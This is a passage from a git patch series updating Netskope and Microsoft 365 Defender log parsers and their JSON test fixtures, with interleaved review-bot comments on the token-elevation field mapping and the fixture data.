2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_type\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\"
:0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}", "event": { - "action": "block", + "action": "Browse", "category": [ "network" ], @@ -23,6 +23,9 @@ ] }, "@timestamp": "2024-11-14T09:01:32Z", + "action": { + "name": "block" + }, "destination": { "address": "1.2.3.4", "bytes": 0, diff --git a/Netskope/netskope_events/tests/test_nspolicy_log.json b/Netskope/netskope_events/tests/test_nspolicy_log.json index d0d9ed304..412ece514 100644 --- a/Netskope/netskope_events/tests/test_nspolicy_log.json +++ b/Netskope/netskope_events/tests/test_nspolicy_log.json @@ -17,6 +17,9 @@ ] }, "@timestamp": "2022-12-21T15:52:00Z", + "action": { + "name": "Allow" + }, "cloud": { "instance": { "id": "Example" diff --git a/Netskope/netskope_events/tests/test_nspolicy_upload.json b/Netskope/netskope_events/tests/test_nspolicy_upload.json index b05f61a9d..314e7d7e1 100644 --- a/Netskope/netskope_events/tests/test_nspolicy_upload.json +++ b/Netskope/netskope_events/tests/test_nspolicy_upload.json @@ -23,6 +23,9 @@ ] }, "@timestamp": "2024-11-14T09:04:46Z", + "action": { + "name": "Allow" + }, "destination": { "address": "1.2.3.4", "bytes": 0, diff --git a/Netskope/netskope_events/tests/test_user_alert.json b/Netskope/netskope_events/tests/test_user_alert.json index 4c435b860..bb5831a9c 100644 --- a/Netskope/netskope_events/tests/test_user_alert.json +++ b/Netskope/netskope_events/tests/test_user_alert.json 
@@ -5,7 +5,7 @@ "expected": { "message": "{\n \"_id\": \"882049056ee9e069c1c329b7\",\n \"access_method\": \"Client\",\n \"action\": \"useralert\",\n \"activity\": \"Share\",\n \"alert\": \"yes\",\n \"app\": \"WeTransfer\",\n \"app_session_id\": 1111111111111111111,\n \"appcategory\": \"Cloud Storage\",\n \"browser\": \"Edge\",\n \"browser_session_id\": 2222222222222222222,\n \"browser_version\": \"108.0.1462.54\",\n \"category\": \"Cloud Storage\",\n \"cci\": 58,\n \"ccl\": \"low\",\n \"connection_id\": 3333333333333333333,\n \"count\": 1,\n \"device\": \"Windows Device\",\n \"device_classification\": \"unmanaged\",\n \"dst_country\": \"IE\",\n \"dst_geoip_src\": 2,\n \"dst_latitude\": 53.3379,\n \"dst_location\": \"Dublin\",\n \"dst_longitude\": -6.2591,\n \"dst_region\": \"Leinster\",\n \"dst_timezone\": \"Europe/Dublin\",\n \"dst_zipcode\": \"D02\",\n \"dstip\": \"108.128.91.183\",\n \"from_user\": \"jane.doe@example.org\",\n \"hostname\": \"TEST-1234\",\n \"managed_app\": \"no\",\n \"managementID\": \"99999999999999999999999999999999\",\n \"netskope_pop\": \"FR-PAR1\",\n \"notify_template\": \"useralert_justify.html\",\n \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n \"object\": \"Client.exe\",\n \"object_type\": \"File\",\n \"organization_unit\": \"\",\n \"os\": \"Windows 11\",\n \"os_version\": \"Windows 11\",\n \"page\": \"wetransfer.com/\",\n \"page_site\": \"Web Background\",\n \"policy\": \"DO NOT CHANGE Educate Upload to Non-Corporate Storage\",\n \"policy_id\": \"99999999999999999999999999999999 2022-12-21 14:31:09.981853\",\n \"protocol\": \"HTTPS/2\",\n \"referer\": \"https://wetransfer.com/\",\n \"request_id\": 4444444444444444444,\n \"severity\": \"unknown\",\n \"site\": \"WeTransfer\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_time\": \"Wed Dec 21 15:52:08 2022\",\n \"src_timezone\": 
\"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.3.2.1\",\n \"telemetry_app\": \"\",\n \"timestamp\": 1671634321,\n \"to_user\": \"a@a.fr\",\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 4444444444444444444,\n \"type\": \"nspolicy\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"wetransfer.com/api/v4/transfers/email\",\n \"user\": \"john.doe@example.org\",\n \"useragent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"internal_collaborator_count\": 0,\n \"fromlogs\": \"\",\n \"dlp_incident_id\": 0,\n \"owner\": \"\",\n \"dlp_profile\": \"\",\n \"workspace\": \"\",\n \"user_id\": \"\",\n \"userPrincipalName\": \"\",\n \"true_obj_category\": \"\",\n \"dlp_is_unique_count\": \"\",\n \"orignal_file_path\": \"\",\n \"other_categories\": [],\n \"serial\": \"\",\n \"tss_mode\": \"\",\n \"conn_duration\": 0,\n \"from_user_category\": \"\",\n \"md5\": \"\",\n \"data_type\": \"\",\n \"title\": \"\",\n \"log_file_name\": \"\",\n \"dstport\": 0,\n \"exposure\": \"\",\n \"instance_id\": \"\",\n \"audit_category\": \"\",\n \"netskope_activity\": \"\",\n \"file_type\": \"\",\n \"total_collaborator_count\": 0,\n \"file_path\": \"\",\n \"modified\": 0,\n \"dlp_rule_count\": 0,\n \"suppression_end_time\": 0,\n \"CononicalName\": \"\",\n \"alert_type\": \"\",\n \"sanctioned_instance\": \"\",\n \"suppression_start_time\": 0,\n \"dlp_parent_id\": 0,\n \"true_obj_type\": \"\",\n \"dlp_mail_parent_id\": \"\",\n \"audit_type\": \"\",\n \"workspace_id\": \"\",\n \"dsthost\": \"\",\n \"web_universal_connector\": \"\",\n \"req_cnt\": 0,\n \"mime_type\": \"\",\n \"suppression_key\": \"\",\n \"scan_type\": \"\",\n \"shared_with\": \"\",\n \"client_bytes\": 0,\n \"object_id\": \"\",\n \"user_category\": \"\",\n \"dlp_rule\": \"\",\n \"parent_id\": \"\",\n \"sha256\": \"\",\n \"dlp_rule_severity\": 
\"\",\n \"logintype\": \"\",\n \"org\": \"\",\n \"dlp_unique_count\": 0,\n \"file_size\": 0,\n \"instance\": \"\",\n \"sAMAccountName\": \"\",\n \"resp_cnt\": 0,\n \"universal_connector\": \"\",\n \"numbytes\": 0,\n \"server_bytes\": 0,\n \"channel_id\": \"\",\n \"file_lang\": \"\",\n \"app_activity\": \"\",\n \"appsuite\": \"\",\n \"sessionid\": \"\",\n \"loginurl\": \"\",\n \"dlp_file\": \"\",\n \"data_center\": \"\",\n \"custom_connector\": \"\"\n}\n", "event": { - "action": "useralert", + "action": "Share", "category": [ "network" ], @@ -17,6 +17,9 @@ ] }, "@timestamp": "2022-12-21T14:52:01Z", + "action": { + "name": "useralert" + }, "destination": { "address": "108.128.91.183", "bytes": 0, From 9264ef70512e299c783d05b43afb38dacd4c3431 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?L=C3=A9na=C3=AFg?= <126670263+LenaigKaliou@users.noreply.github.com> Date: Thu, 28 Nov 2024 10:25:08 +0100 Subject: [PATCH 292/317] Update Microsoft/microsoft-365-defender/ingest/parser.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- Microsoft/microsoft-365-defender/ingest/parser.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index fc32171cd..d212bdb11 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml 
@@ -267,7 +267,8 @@ stages:
 action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}"
 action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}"
 action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}"
- action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}"
+ action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}"
+ action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}"
 action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
 action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}"
 action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}"
From a4b94af6afa920ba08482254408c406c0ef90db6 Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Thu, 28 Nov 2024 11:57:27 +0100
Subject: [PATCH 293/317] Correction of overwrited test file
---
 .../tests/test_device_process_events_2.json | 114 ++++++------------
 1 file changed, 36 insertions(+), 78 deletions(-)
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
index cab75fb0a..9b0327128 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
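Review bot: The new `action.properties.ProcessTokenElevation` mapping is dropped into the middle of the `InitiatingProcess*` run, which breaks the grouping the surrounding block uses; placing it with the other created-process properties, or at least after the `InitiatingProcess*` lines, keeps the two token-elevation sources visually distinct, which is the point of removing the `or` fallback. The split itself is right: the old expression silently reported the created process's elevation as the initiating process's whenever the latter was missing, and those are different trust boundaries for any rule that keys on elevation. The only fixture touched in PATCH 293 (test_device_process_events_2.json) had both fields equal to `TokenElevationTypeDefault` in its previous input, so unless the replacement input differs it cannot detect a swapped mapping; a record where the two values differ would pin the fix. The enclosing `stages:` mapping starts and ends outside the hunk.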
@@ -1,6 +1,6 @@ { "input": { - "message": "{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account 
domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", 
\"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": 
\"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, 
\"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", "sekoiaio": { "intake": { "dialect": "Microsoft 365 Defender", 
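Review bot: The new fixture input carries a concrete tenant GUID (`793abec2-9e48-4d04-b341-59b054c49348`) and device id (`86dd1cf45142e904cb2e99c2721fac3ca198c6ca`) where the removed sample used `xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx`; if these values come from a real tenant they should be masked the same way before landing in a public test file, and the same message string recurs in the `expected.message` hunk (-9). Separately, the input sets both `InitiatingProcessTokenElevation` and `ProcessTokenElevation` to the literal string `"None"`, while the expected event in hunk -19 carries no `action.properties.*TokenElevation` keys at all, so the fixture pins a behaviour in which a vendor value spelled `None` disappears as if it were null. That may be the intended null handling, but it is worth confirming it is not a side effect of how the rendered string `None` is interpreted, since the removed fixture kept `TokenElevationTypeDefault` for the same keys.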
@@ -9,7 +9,7 @@ } }, "expected": { - "message": "{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account 
domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", 
\"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": 
